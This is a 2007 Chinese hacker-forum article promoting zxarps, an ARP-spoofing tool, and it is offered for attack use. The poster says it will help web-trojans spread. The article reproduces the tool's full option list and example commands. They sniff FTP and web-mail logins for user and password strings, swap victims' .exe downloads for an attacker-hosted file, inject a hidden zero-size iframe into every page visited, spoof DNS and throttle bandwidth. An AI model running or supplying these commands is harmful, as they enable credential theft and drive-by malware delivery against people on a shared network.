最近幻影的两个ARP欺骗工具挺不错的--幻影,ARP欺骗,工具,ARP

[推荐]最近幻影的两个ARP欺骗工具挺不错的

荐 ★★★★

最近幻影的两个ARP欺骗工具挺不错的

文章整理发布：黑客风云文章来源：www.05112.com 更新时间：2007-1-20

zxarps

在当今网马横飞的日子，我帖个东东，让网马飞得更猛烈些吧

说明：
需要winPcap
基于arp欺骗，
具体功能看下面的使用说明~~~懒得打太多字了~~~

一些注意：
通常欺骗都是针对网关和同网段下的其他机，所以-sethost [ip] 参数可以不填，
但如果同网段下有某server，而你想嗅探其他用户到该server的数据就要-sethost serverIP

Codz:


0. Realtek RTL8139 

    IP Address. . . . . : 192.168.1.101 

    Physical Address. . : 00-11-D8-6B-5E-19 

    Default Gateway . . : 192.168.1.1 



1. WAN (PPP/SLIP) Interface 

    IP Address. . . . . : xx.xx.xx.xx 

    Physical Address. . : 00-52-00-00-00-00 

    Default Gateway . . : xx.xx.xx.xx 

options: 

    -idx [index]       网卡索引号 

    -ip [ip]           欺骗的IP,用'-'指定范围,','隔开 

    -sethost [ip]      默认是网关,可以指定别的IP 

    -port [port]       关注的端口,用'-'指定范围,','隔开,没指定默认关注所有端口 

    -reset             恢复目标机的ARP表 

    -hostname          探测主机时获取主机名信息 

    -logfilter [string]设置保存数据的条件，必须+-_做前缀,后跟关键字, 

                       ','隔开关键字,多个条件'|'隔开 

                       所有带+前缀的关键字都出现的包则写入文件 

                       带-前缀的关键字出现的包不写入文件 

                       带_前缀的关键字一个符合则写入文件(如有+-条件也要符合) 

    -save_a [filename] 将捕捉到的数据写入文件 ACSII模式 

    -save_h [filename] HEX模式 



    -hacksite [ip]     指定要插入代码的站点域名或IP, 

                       多个可用','隔开,没指定则影响所有站点 

    -insert [html code]指定要插入html代码 



    -postfix [string]  关注的后缀名，只关注HTTP/1.1 302 

    -hackURL [url]     发现关注的后缀名后修改URL到新的URL 

    -filename [name]   新URL上有效的资源文件名 



    -hackdns [string]  DNS欺骗，只修改UDP的报文,多个可用','隔开 

                       格式: 域名|IP，www.aa.com|222.22.2.2,www.bb.com|1.1.1.1 



    -Interval [ms]     定时欺骗的时间间隔，单位:毫秒:默认是3000 ms 

    -spoofmode [1|2|3] 将数据骗发到本机,欺骗对象:1为网关,2为目标机,3为两者(默认) 

    -speed [kb]        限制指定的IP或IP段的网络总带宽,单位:KB 



example: 

    嗅探指定的IP段中端口80的数据，并以HEX模式写入文件 

    zxarps.exe -idx 0 -ip 192.168.0.2-192.168.0.50 -port 80 -save_h sniff.log 



    FTP嗅探,在21或2121端口中出现USER或PASS的数据包记录到文件 

    zxarps.exe -idx 0 -ip 192.168.0.2 -port 21,2121 -spoofmode 2 -logfilter "_USER ,_PASS" -save_a sniff.log 



    HTTP web邮箱登陆或一些论坛登陆的嗅探,根据情况自行改关键字 

    zxarps.exe -idx 0 -ip 192.168.0.2-192.168.0.50 -port 80 -logfilter "+POST ,+user,+pass" -save_a sniff.log 



    用|添加嗅探条件,这样FTP和HTTP的一些敏感关键字可以一起嗅探 

    zxarps.exe -idx 0 -ip 192.168.0.2 -port 80,21 -logfilter "+POST ,+user,+pass|_USER ,_PASS" -save_a sniff.log 



    如果嗅探到目标下载文件后缀是exe等则更改Location:为http://xx.net/test.exe 

    zxarps.exe -idx 0 -ip 192.168.0.2-192.168.0.12,192.168.0.20-192.168.0.30 -spoofmode 3 -postfix ".exe,.rar,.zip" -hackurl http://xx.net/ -filename test.exe 



    指定的IP段中的用户访问到-hacksite中的网址则只显示just for fun 

    zxarps.exe -idx 0 -ip 192.168.0.2-192.168.0.99 -port 80 -hacksite 222.2.2.2,www.a.com,www.b.com -insert "just for fun<noframes>" 



    指定的IP段中的用户访问的所有网站都插入一个框架代码 

    zxarps.exe -idx 0 -ip 192.168.0.2-192.168.0.99 -port 80 -insert "<iframe src='xx' width=0 height=0>" 



    指定的两个IP的总带宽限制到20KB 

    zxarps.exe -idx 0 -ip 192.168.0.55,192.168.0.66 -speed 20 



    DNS欺骗 

    zxarps.exe -idx 0 -ip 192.168.0.55,192.168.0.66 -hackdns "www.aa.com|222.22.2.2,www.bb.com|1.1.1.1" 



zxarps Build 01/19/2007 By LZX.

下载：zxarps下载

上一页 [1] [2]

文章录入：sygbox 责任编辑：sygbox

上一篇文章：可ARP欺骗、网页插马、DNS欺骗的黑软：zxarps

下一篇文章： openrowset/opendatasource的功能介绍

【字体：小大】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】

VIP 专区

	抽根憋闷烟的心声
	学习网页制作的理由
	加入终身会员的理由!!!
	学习黑客编程的5大理由
	学习免杀的6大理由
	学习软件破解的理由
	会员账号开通查询
	常见问题解答
	汇款向导
	学员报名咨询

	OllyDBG破解工具入门教程	02-06
	3389密码的嗅探	02-06
	防黑之阻断基于PcAnyWhere的攻击	01-11
	取代NBSI2：Opendatasource And	01-08
	黑洞远程控制软件V1.0（黑洞2007	12-11
	远离QQ木马威胁！QQ医生新品试用	12-07
	网络分析专家sniffer之流量扫描篇	12-04
	病毒终结者卡巴斯基6.0闪亮登场	11-30
	Discuz论坛爆物理路径原理+工具	11-28
	精品后门程序介绍及思路分板	10-30
	IISPutScanner v1.0扫描入侵工具	10-20
	通用php远程文件包含漏洞获取web	10-16